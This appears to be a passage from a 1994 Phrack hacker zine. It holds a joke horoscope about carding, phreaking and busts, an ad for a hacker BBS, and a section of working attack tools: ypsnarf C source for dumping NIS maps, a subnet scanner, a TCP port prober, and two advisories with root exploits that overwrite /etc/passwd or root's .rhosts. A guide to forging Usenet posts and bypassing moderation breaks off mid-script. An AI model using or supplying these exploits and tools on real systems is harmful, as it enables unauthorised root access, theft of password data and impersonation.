Virgo Capricorn Sagittarius Libra
Libra Virgo Libra Virgo
Scorpio Pisces Capricorn Pisces
Sagittarius Aquarius Scorpio Aquarius
Capricorn Taurus Taurus Aries
==============================================================
---
And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope!
Aries [March 21st - April 19th]
There is a pot full of k0DeZ at the end of the rainbow for you.
Try to channel all your ambition on finding it, hint: you won't
find it in /bin/gif/kitchen.gear.
Warning: Risk of bust between August 5th and August 10th!
Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....]
Taurus [April 20th - May 20th]
PhedZzZz are lurking behind Saturn, obscured behind one of the rings.
Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake
any interstellar space travel, and avoid big yellow ships.
Watch out for SprintNet Security between July 12th and August 1st.
Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]
Gemini [May 21st - June 20th]
There might be a force dragging you into warez boards. Try to resist
the attraction, or you might be thrown out of the paradise.
Hint: If a stranger with a /ASL connect crosses your way, stay away
from him.
Warning: Your Dual Standard HST might explode sometime in June.
Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
Cancer [June 21st - July 22nd]
There are dark forces on your trail. Try to avoid all people wearing
suits, don't get in their cars, and don't let them give you shit.
Hint: Leave the country as soon if you can, or you won't be able to.
Look out for U4EA on IRC in late July, you might get /killed.
Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]
Leo [July 23rd - August 22nd]
The path of Venus this year tells us that there is love on the way
for you. Don't look for it on X-rated ftp sites, it might be out there
somewhere. Hint: Try getting out of the house more frequently or you
might miss it.
Warning: If Monica Weaver comes across your way, break and run!
Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]
Virgo [August 23rd - September 22nd]
Pluto tells us that you should stay away from VAXes in the near future.
Lunatic force tells us that you might have more luck on Berkeley UNIX.
Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs.
Warning: In the first week of October, there is a risk of being ANIed.
Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]
Libra [September 23rd - October 22nd]
The closer way of Mars around the Sun this year might mean that you
will be sued by a telco or a big corporation. The eclipse of Uranus
could say that you might have some luck and card a VGA 486 Laptop.
Hint: Be careful on the cordless.
Watch out for good stuff in dumpsters between July 23rd and July 31st.
Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]
Scorpio [October 23rd - November 21st]
Sun propulsions say that you should spend more time exploring the
innards of credit report systems, but be aware that Saturn reminds
you that one local car dealer has his I.D. monitored.
Hint: Stay out of #warez
Warning: A star called 43-141 might be your doom. Watch out.
Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]
Sagittarius [November 22nd - December 21st]
Cold storms on Pluto suggest that you don't try to play eleet
anarchist on one of the upcoming cons. Pluto also sees that there
might be a slight chance that you catch a bullet pestering a cop.
Hint: Be nice to your relatives.
You might get lucky BSing during the third week of August.
Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]
Capricorn [December 22nd - January 19th]
This summer brings luck to you. Everything you try is about to work
out. You might find financial gain in selling k0DeZ to local warez
bozos. Hint: Don't try to BS at a number who is a prime number, they
will trace your ass and beat you to death with a raw cucumber.
Special kick of luck between June 14th and July 2nd.
Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]
Aquarius [January 20th - February 18th]
The third moon of Saturn suggests to stay in bed over the whole
summer, or everything will worsen. Avoid to go to any meetings
and cons. Do not try to get up before September 11th.
Hint: You can risk to call PRODIGY and have a gR3aT time.
Warning: High chance of eavesdroping on your line on August 14th.
Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....]
Pisces [February 19th - March 20th]
Mars reads a high mobility this summer. You should try to go to a
foreign county, maybe visit HEU II. Finances will be OK. Do not go
on any buses for that might be your doom.
Hint: Don't get a seat near a window, whatever you do.
Warning: Avoid 6'8" black guys in Holland, they might go for your ass.
Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
If your horoscope does not come true, complain to god@heaven.mil. 31337
If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R
------------------------------------------------------------------------------
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
The SenseReal Mission
If you are reading this it indicates you have reached a point
along your journey that you will have to decide whether you agree
with The SenseReal Foundation or whether you think that those who
believe and support The SenseReal Foundation are crazy. Your
decision to join The SenseReal Foundation on it's mission will
undoubtedly change your life forever. When you understand the
reason it exists and what it seeks you will better know how to
decide. That is why this text was created.
He is known as Green Ghost. Some know him as Jim Nightshade. He
was born in 1966. He is not a baby boomer and he is not a
Generation Xer. He falls into that group of the population that
has so far escaped definition. He is a (yberpunk. He was (yberpunk
before (yberpunk was cool. He is the founder and leader of The
SenseReal Foundation. You will learn more about him later.
But first you will have to know about the background. There once
was a man named Albert Hoffman. In 1943, on April 16 Hoffman
absorbed a threshold amount of the drug known as LSD. He
experienced "a peculiar restlessness". LSD since that time has
played an important role in this world.
There are other agents involved in the story. Mary Pinchot, JFK,
Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley
and many others. There are too many details and explanations
necessary to explain everything here. But this does not matter.
Because the SenseReal Foundation is about riding the wave. We
believe that the ultimate goal cannot be defined. To define it
would be to destroy it.
The SenseReal Foundation hopes that things can be changed for
the better. But we realize that the situation can become
much worse. From what history teaches us and what we instinctively
feel, we know that there is a great probability that things will
get much worse before and if things ever get better. Doom looms
on the horizon like an old friend.
Freedom is being threatened every day and The SenseReal
Foundation seeks to defend and seek Freedom. Big Brother is here
NOW and to deny his existence is only to play into his hand. The
goal of our government both here in America and worldwide is to
remain in power and increase it's control of The People. To
expose Big Brother and destroy him is one of the many goals of
The SenseReal Foundation.
As a member of (yberspace and an agent of The SenseReal
Foundation you will have to carefully consider your interaction
with the flow of Info. The ideals of Liberty must be maintained.
The SenseReal Foundation provides a grounding point. The place
where the spark transfers from plasma to light and back to plasma.
Tesla was not on the wrong track. The SenseReal Foundation is a
mechanism which seeks to increase Freedom. Only by learning more
can we defeat the Evil. The Good must prevail.
If you have the Hacker spirit and think along the same lines
then The SenseReal Foundation may be your calling. If you think
like J.R. Dobbs or Green Ghost then it is possible we can make it
through The Apocalypse. A final date has never been announced for
this event. Green Ghost does not claim to know the exact date but
he does claim to have some Info on it.
Green Ghost does not claim to have all the answers or even to
know all the questions. He was first exposed to computers in the
early 70's at his local high school. The first computer he ever
used was a Honeywell terminal connected to a mainframe operated
at the home office of Honeywell and operated for the school.
This machine was programed by feeding it stacks of cards with
boxes X'd out with a No. 2 pencil. It did have a keyboard hooked
up to a printer which served for the monitor. The text was typed
out and the paper rolled out of the machine in great waves.
This experience left him wanting more. Somewhere between the
machine and the mind were all the questions and all the answers.
The SenseReal Foundation will supply some of the means. We
must all work together if we are to succeed. UNITED WE STAND,
DIVIDED WE FALL. If you wish to participate with The SenseReal
Foundation you must devote yourself to becoming an Info Agent.
As an Info Agent it is your duty to seek Truth and Knowledge
out wherever it is located. To Learn and to seek to increase
the Learning of all at The SenseReal Foundation. Different
people will be needed to help out in different ways.
SenseReal's Info Agents are located all around the world and
are in contact with fellow SenseReal members via any one of
several SenseReal facilities. The primary establishment and
headquarters of The SenseReal Foundation is SenseReal's own
online system:
T /-/ E /-/ /=\ ( /< E R ' S /\/\ /=\ /\/ S / O /\/
>>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<<
27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation
Also contact via SenseReal's mail drop by writing or sending
materials to: TSF \ Electronic Mail:
P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us
HILTON HEAD, SC 29938-6914 \
The Hacker's /\/\ansion is a system like no other. While it is
not your typical Hackers board it has much Info on Hacking. While
it is not like any Adult system you've ever seen it has the most
finest Adult material available anywhere. It is not a Warez board
but we are definitely Pirates. Because we are (yberpunks. What
makes the Hacker's Mansion different is our emphasis on quality.
Everything that you find at The /-/acker's /\/\ansion is 1ST
(lass. All the coolest E-zines are pursued here. Phrack, CUD, and
Thought Virus to name just a few. Of course there is one other
source for Thought Virus:
Send E-Mail to: ListServ@neonate.atl.ga.us
In the subject or body of the message write:
FAQ ThoughtCriminals
and you will receive the current issue in your E-Mail box in no
time. If you wish to join the Thought Criminals mailing list and
communicate with your fellow Thought Criminals via E-Mail then
send another message to: ListServ@neonate.atl.ga.us
and write the following in the subject or body of the message:
Subscribe ThoughtCriminals Your-Address-Here
or simply: Subscribe ThoughtCriminals
To mail others on the Thought Criminals mailing list send a message
to: ThoughtCriminals@neonate.atl.ga.us
Tell us all. Communication is vital. Our survival may depend on
it. The SenseReal Foundation is about the allegiance of many
people, and indeed beings, as our friends from other planets can
tell you. The EFF inspired us and was a model but we don't have
the EFF's money so we need YOU. If you are someone who can
contribute or who believes in The Cause or are just interested
in Tax Resistance or the Free The Weed movement then you should
join The SenseReal Foundation today. Contact us through any of
above channels and become a Freedom Fighter today. Time is of
the essence.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
------------------------------------------------------------------------------
** OLD SHIT THAT STILL WORKS **
- sometimes -
/*
* THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN
* THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE
* IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM. PLEASE DO NOT
* REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY.
*
* ypsnarf - exercise security holes in yp/nis.
*
* Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik
* (casper@fwi.uva.nl).
*
* Usage:
* ypsnarf server client
* - to obtain the yp domain name
* ypsnarf server domain mapname
* - to obtain a copy of a yp map
* ypsnarf server domain maplist
* - to obtain a list of yp maps
*
* In the first case, we lie and pretend to be the host "client", and send
* a BOOTPARAMPROC_WHOAMI request to the host "server". Note that for this
* to work, "server" must be running rpc.bootparamd, and "client" must be a
* diskless client of (well, it must boot from) "server".
*
* In the second case, we send a YPPROC_DOMAIN request to the host "server",
* asking if it serves domain "domain". If so, we send YPPROC_FIRST and
* YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map
* "mapname". Note that you must specify the full yp map name, you cannot
* use the shorthand names provided by "ypcat".
*
* In the third case, the special map name "maplist" tells ypsnarf to send
* a YPPROC_MAPLIST request to the server and get the list of maps in domain
* "domain", instead of getting the contents of a map. If the server has a
* map called "maplist" you can't get it. Oh well.
*
* Since the callrpc() routine does not make any provision for timeouts, we
* artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the
* initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer.
*
* This program uses UDP packets, which means there's a chance that things
* will get dropped on the floor; it's not a reliable stream like TCP. In
* practice though, this doesn't seem to be a problem.
*
* To compile:
* cc -o ypsnarf ypsnarf.c -lrpcsvc
*
* David A. Curry
* Purdue University
* Engineering Computer Network
* Electrical Engineering Building
* West Lafayette, IN 47907
* davy@ecn.purdue.edu
* January, 1991
*/
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <rpc/rpc.h>
#include <rpcsvc/bootparam.h>
#include <rpcsvc/yp_prot.h>
#include <rpc/pmap_clnt.h>
#include <sys/time.h>
#include <signal.h>
#include <string.h>
#include <netdb.h>
#include <stdio.h>
#define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd */
#define YPSNARF_TIMEOUT1 15 /* timeout for initial request */
#define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */
char *pname; /* program name */
main(argc, argv)
char **argv;
int argc;
{
char *server, *client, *domain, *mapname;
pname = *argv;
/*
* Process arguments. This is less than robust, but then
* hey, you're supposed to know what you're doing.
*/
switch (argc) {
case 3:
server = *++argv;
client = *++argv;
get_yp_domain(server, client);
exit(0);
case 4:
server = *++argv;
domain = *++argv;
mapname = *++argv;
if (strcmp(mapname, "maplist") == 0)
get_yp_maplist(server, domain);
else
get_yp_map(server, domain, mapname);
exit(0);
default:
fprintf(stderr, "Usage: %s server client -", pname);
fprintf(stderr, "to obtain yp domain name\n");
fprintf(stderr, " %s server domain mapname -", pname);
fprintf(stderr, "to obtain contents of yp map\n");
exit(1);
}
}
/*
* get_yp_domain - figure out the yp domain used between server and client.
*/
get_yp_domain(server, client)
char *server, *client;
{
long hostip;
struct hostent *hp;
bp_whoami_arg w_arg;
bp_whoami_res w_res;
extern void timeout();
enum clnt_stat errcode;
/*
* Just a sanity check, here.
*/
if ((hp = gethostbyname(server)) == NULL) {
fprintf(stderr, "%s: %s: unknown host.\n", pname, server);
exit(1);
}
/*
* Allow the client to be either an internet address or a
* host name. Copy in the internet address.
*/
if ((hostip = inet_addr(client)) == -1) {
if ((hp = gethostbyname(client)) == NULL) {
fprintf(stderr, "%s: %s: unknown host.\n", pname,
client);
exit(1);
}
bcopy(hp->h_addr_list[0],
(caddr_t) &w_arg.client_address.bp_address.ip_addr,
hp->h_length);
}
else {
bcopy((caddr_t) &hostip,
(caddr_t) &w_arg.client_address.bp_address.ip_addr,
sizeof(ip_addr_t));
}
w_arg.client_address.address_type = IP_ADDR_TYPE;
bzero((caddr_t) &w_res, sizeof(bp_whoami_res));
/*
* Send a BOOTPARAMPROC_WHOAMI request to the server. This will
* give us the yp domain in the response, IFF client boots from
* the server.
*/
signal(SIGALRM, timeout);
alarm(YPSNARF_TIMEOUT1);
errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS,
BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg,
xdr_bp_whoami_res, &w_res);
alarm(0);
if (errcode != RPC_SUCCESS)
print_rpc_err(errcode);
/*
* Print the domain name.
*/
printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name);
/*
* The maximum domain name length is 255 characters, but the
* rpc.bootparamd program truncates anything over 32 chars.
*/
if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN)
printf(" (truncated?)");
/*
* Put out the client name, if they didn't know it.
*/
if (hostip != -1)
printf(" (client name = %s)", w_res.client_name);
putchar('\n');
}
/*
* get_yp_map - get the yp map "mapname" from yp domain "domain" from server.
*/
get_yp_map(server, domain, mapname)
char *server, *domain, *mapname;
{
char *reqp;
bool_t yesno;
u_long calltype;
bool (*xdr_proc)();
extern void timeout();
enum clnt_stat errcode;
struct ypreq_key keyreq;
struct ypreq_nokey nokeyreq;
struct ypresp_key_val answer;
/*
* This code isn't needed; the next call will give the same
* error message if there's no yp server there.
*/
#ifdef not_necessary
/*
* "Ping" the yp server and see if it's there.
*/
signal(SIGALRM, timeout);
alarm(YPSNARF_TIMEOUT1);
errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
xdr_void, 0);
alarm(0);
if (errcode != RPC_SUCCESS)
print_rpc_err(errcode);
#endif
/*
* Figure out whether server serves the yp domain we want.
*/
signal(SIGALRM, timeout);
alarm(YPSNARF_TIMEOUT1);
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
xdr_wrapstring, (caddr_t) &domain, xdr_bool,
(caddr_t) &yesno);
alarm(0);
if (errcode != RPC_SUCCESS)
print_rpc_err(errcode);
/*
* Nope...
*/
if (yesno == FALSE) {
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
server, domain);
exit(1);
}
/*
* Now we just read entry after entry... The first entry we
* get with a nokey request.
*/
keyreq.domain = nokeyreq.domain = domain;
keyreq.map = nokeyreq.map = mapname;
reqp = (caddr_t) &nokeyreq;
keyreq.keydat.dptr = NULL;
answer.status = TRUE;
calltype = YPPROC_FIRST;
xdr_proc = xdr_ypreq_nokey;
while (answer.status == TRUE) {
bzero((caddr_t) &answer, sizeof(struct ypresp_key_val));
signal(SIGALRM, timeout);
alarm(YPSNARF_TIMEOUT2);
errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc,
reqp, xdr_ypresp_key_val, &answer);
alarm(0);
if (errcode != RPC_SUCCESS)
print_rpc_err(errcode);
/*
* Got something; print it.
*/
if (answer.status == TRUE) {
printf("%.*s\n", answer.valdat.dsize,
answer.valdat.dptr);
}
/*
* Now we're requesting the next item, so have to
* send back the current key.
*/
calltype = YPPROC_NEXT;
reqp = (caddr_t) &keyreq;
xdr_proc = xdr_ypreq_key;
if (keyreq.keydat.dptr)
free(keyreq.keydat.dptr);
keyreq.keydat = answer.keydat;
if (answer.valdat.dptr)
free(answer.valdat.dptr);
}
}
/*
* get_yp_maplist - get the yp map list for yp domain "domain" from server.
*/
get_yp_maplist(server, domain)
char *server, *domain;
{
bool_t yesno;
extern void timeout();
struct ypmaplist *mpl;
enum clnt_stat errcode;
struct ypresp_maplist maplist;
/*
* This code isn't needed; the next call will give the same
* error message if there's no yp server there.
*/
#ifdef not_necessary
/*
* "Ping" the yp server and see if it's there.
*/
signal(SIGALRM, timeout);
alarm(YPSNARF_TIMEOUT1);
errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
xdr_void, 0);
alarm(0);
if (errcode != RPC_SUCCESS)
print_rpc_err(errcode);
#endif
/*
* Figure out whether server serves the yp domain we want.
*/
signal(SIGALRM, timeout);
alarm(YPSNARF_TIMEOUT1);
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
xdr_wrapstring, (caddr_t) &domain, xdr_bool,
(caddr_t) &yesno);
alarm(0);
if (errcode != RPC_SUCCESS)
print_rpc_err(errcode);
/*
* Nope...
*/
if (yesno == FALSE) {
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
server, domain);
exit(1);
}
maplist.list = (struct ypmaplist *) NULL;
/*
* Now ask for the list.
*/
signal(SIGALRM, timeout);
alarm(YPSNARF_TIMEOUT1);
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST,
xdr_wrapstring, (caddr_t) &domain,
xdr_ypresp_maplist, &maplist);
alarm(0);
if (errcode != RPC_SUCCESS)
print_rpc_err(errcode);
if (maplist.status != YP_TRUE) {
fprintf(stderr, "%s: cannot get map list: %s\n", pname,
yperr_string(ypprot_err(maplist.status)));
exit(1);
}
/*
* Print out the list.
*/
for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next)
printf("%s\n", mpl->ypml_name);
}
/*
* print_rpc_err - print an rpc error and exit.
*/
print_rpc_err(errcode)
enum clnt_stat errcode;
{
fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode));
exit(1);
}
/*
* timeout - print a timeout and exit.
*/
void timeout()
{
fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname);
exit(1);
}
------------------------------------------------------------------------------
#!/bin/perl -s
#
# Scan a subnet for valid hosts; if given hostname, will look at the
# 255 possible hosts on that net. Report if host is running rexd or
# ypserv.
#
# Usage: scan n.n.n.n
# mine, by default
$default = "130.80.26";
$| = 1;
if ($v) { $verbose = 1; }
if ($#ARGV == -1) { $root = $default; }
else { $root = $ARGV[0]; }
# ip address
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
$root = "$one.$two.$three";
if ($root eq "..") { die "Can't figure out what to scan...\n"; }
}
print "Subnet $root:\n" if $verbose;
for $i (01..255) {
print "Trying $root.$i\t=> " if $verbose;
&resolve("$root.$i");
}
#
# Do the work
#
sub resolve {
local($name) = @_;
# ip address
if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
($a,$b,$c,$d) = split(/\./, $name);
@ip = ($a,$b,$c,$d);
($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
}
else {
($name, $aliases, $type, $len, @ip) = gethostbyname($name);
($a,$b,$c,$d) = unpack('C4',$ip[0]);
}
if ($name && @ip) {
print "$a.$b.$c.$d\t$name\n";
system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
unning ypserv.\"\nfi\nfi");
}
else { print "unable to resolve address\n" if $verbose; }
}
sub AF_INET {2;}
------------------------------------------------------------------------------
/*
* probe_tcp_ports
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define RETURN_ERR -1
#define RETURN_FAIL 0
#define RETURN_SUCCESS 1
int Debug;
int Hack;
int Verbose;
main(ArgC, ArgV)
int ArgC;
char **ArgV;
{
int Index;
int SubIndex;
for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++)
for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++)
switch (ArgV[Index][SubIndex])
{
case 'd':
Debug++;
break;
case 'h':
Hack++;
break;
case 'v':
Verbose++;
break;
default:
(void) fprintf(stderr,
"Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n");
exit(1);
}
for (; Index < ArgC; Index++)
(void) Probe_TCP_Ports(ArgV[Index]);
exit(0);
}
Probe_TCP_Ports(Name)
char *Name;
{
unsigned Port;
char *Host;
struct hostent *HostEntryPointer;
struct sockaddr_in SocketInetAddr;
struct hostent TargetHost;
struct in_addr TargetHostAddr;
char *AddressList[1];
char NameBuffer[128];
extern int inet_addr();
extern char *rindex();
if (Name == NULL)
return (RETURN_FAIL);
Host = Name;
if (Host == NULL)
return (RETURN_FAIL);
HostEntryPointer = gethostbyname(Host);
if (HostEntryPointer == NULL)
{
TargetHostAddr.s_addr = inet_addr(Host);
if (TargetHostAddr.s_addr == -1)
{
(void) printf("unknown host: %s\n", Host);
return (RETURN_FAIL);
}
(void) strcpy(NameBuffer, Host);
TargetHost.h_name = NameBuffer;
TargetHost.h_addr_list = AddressList, TargetHost.h_addr =
(char *) &TargetHostAddr;
TargetHost.h_length = sizeof(struct in_addr);
TargetHost.h_addrtype = AF_INET;
TargetHost.h_aliases = 0;
HostEntryPointer = &TargetHost;
}
SocketInetAddr.sin_family = HostEntryPointer->h_addrtype;
bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr,
HostEntryPointer->h_length);
for (Port = 1; Port < 65536; Port++)
(void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr);
return (RETURN_SUCCESS);
}
Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr)
unsigned Port;
struct hostent *HostEntryPointer;
struct sockaddr_in SocketInetAddr;
{
char Buffer[BUFSIZ];
int SocketDescriptor;
struct servent *ServiceEntryPointer;
SocketInetAddr.sin_port = Port;
SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6);
if (SocketDescriptor < 0)
{
perror("socket");
return (RETURN_ERR);
}
if (Verbose)
{
(void) printf("Host %s, Port %d ", HostEntryPointer->h_name,
Port);
if ((ServiceEntryPointer = getservbyport(Port, "tcp")) !=
(struct servent *) NULL)
(void) printf(" (\"%s\" service) ",
ServiceEntryPointer->s_name);
(void) printf("connection ... ");
(void) fflush(stdout);
}
if (connect(SocketDescriptor, (char *) &SocketInetAddr,
sizeof(SocketInetAddr)) < 0)
{
if (Verbose)
(void) printf("NOT open.\n");
if (Debug)
perror("connect");
}
else
{
if (!Verbose)
{
(void) printf("Host %s, Port %d ",
HostEntryPointer->h_name, Port);
if ((ServiceEntryPointer = getservbyport(Port,"tcp")) !=
(struct servent *) NULL)
(void) printf(" (\"%s\" service) ",
ServiceEntryPointer->s_name);
(void) printf("connection ... ");
(void) fflush(stdout);
}
(void) printf("open.\n");
if (Hack)
{
(void) sprintf(Buffer, "/usr/ucb/telnet %s %d",
HostEntryPointer->h_name, Port);
(void) system(Buffer);
}
}
(void) close(SocketDescriptor);
return (RETURN_SUCCESS);
}
------------------------------------------------------------------------------
[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991
PROGRAM:
autoreply(1) (/usr/local/bin/autoreply)
Supplied with the Elm Mail System
VULNERABLE OS's:
Any system with a standard installation of The Elm Mail System.
All versions are believed to have this vulnerability.
DESCRIPTION:
autoreply(1) can be used to create root owned files, with mode
666. It can also overwrite any file with semi user-controlled
data.
IMPACT:
Any user with access to autoreply(1) can alter system files and
thus become root.
REPEAT BY:
This example demonstrates how to become root on most affected
machines by modifying root's .rhosts file. Please do not do
this unless you have permission.
Create the following script, 'fixrhosts':
8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
echo "Usage: `basename $0` rhosts-file user machine"
exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
autoreply "a
$MACHINE $USERNAME
b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % ./fixrhosts ~root/.rhosts 8lgm localhost
You've been added to the autoreply system.
You've been removed from the autoreply table.
> % rsh localhost -l root csh -i
Warning: no access to tty.
Thus no job control in this shell.
#
FIX:
1. Disable autoreply.
2. Wait for a patch from the Elm maintainers.
------------------------------------------------------------------------------
[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991
PROGRAM:
lpr(1) (/usr/ucb/lpr or /usr/bin/lpr)
VULNERABLE OS's:
SunOS 4.1.1 or earlier
BSD 4.3
BSD NET/2 Derived Systems
A/UX 2.0.1
Most systems supporting the BSD LP subsystem
DESCRIPTION:
lpr(1) can be used to overwrite or create (and become owner of)
any file on the system. lpr -s allows users to create symbolic
links in lpd's spool directory (typically /var/spool/lpd).
After 1000 invocations of lpr, lpr will reuse the filename in
the spool directory, and follow the link previously installed.
It will thus overwrite/create any file that this link points too.
IMPACT:
Any user with access to lpr(1) can alter system files and thus
become root.
REPEAT BY:
This example demonstrates how to become root on most affected
machines by modifying /etc/passwd and /etc/group. Please do
not do this unless you have permission.
Create the following script, 'lprcp':
8<--------------------------- cut here ----------------------------
#!/bin/csh -f
#
# Usage: lprcp from-file to-file
#
if ($#argv != 2) then
echo Usage: lprcp from-file to-file
exit 1
endif
# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$ # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$ # to where we really want
@ s = 0
while ( $s != 999) # loop 999 times
lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
@ s++
if ( $s % 10 == 0 ) echo -n .
end
lpr $1 # incoming file
# user becomes owner
rm -f /tmp/.tmp.$$
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
Make copies of /etc/passwd and /etc/group, and modify them:
> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
/tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
/tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
/tmp/group: unmodified: line 49
> :/wheel
wheel:*:0:root,operator
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
/tmp/group: 49 lines, 944 characters.
Install our new files:
> % ./lprcp /tmp/group /etc/group
................................................................
...................................
lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
.................................................................
..................................
lpr: cannot rename /var/spool/lpd/cfA061testnode
Check it worked:
> % ls -l /etc/passwd /etc/group
-rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group
-rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd
> % head -1 /etc/group
wheel:*:0:root,operator,8lgm
> % grep '^8lgmroot' /etc/passwd
8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
Become root and tidy up:
> % su 8lgmroot
# chown root /etc/passwd /etc/group
# rm -f /tmp/passwd /tmp/group
#
FIX:
1. Contact your vendor for a fix.
2. In the meantime, apply the following patch, derived from
BSD NET/2 source, which will correct the flaw on most
affected systems:
------------------------------------------------------------------------------
Anonymous netnews without "anonymous" remailers
Save any news article to a file. We'll call it "hak" in this example.
Edit hak, and remove any header lines of the form
From some!random!path!user (note: "From ", not "From: " !!)
Article:
Lines:
Shorten the Path: header down to its LAST two or three "bangized" components.
This is to make the article look like it was posted from where it really was
posted, and originally hit the net at or near the host you send it to. Or
you can construct a completely new Path: line to reflect your assumed alias.
Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere. This is usually best done by adding a couple of
random characters to the part before the @, since news posting programs
generally use a fixed-length field to generate these IDs.
Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc. Replace the original message text with your message.
If you are posting to a moderated group, remember to put in an Approved:
header to bypass the moderation mechanism.
Write out the changed file, and send it to your favorite NNTP server that
permits transfers via the IHAVE command, using the following script:
=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
sed 's/.*-[Ii][Dd]: //'`
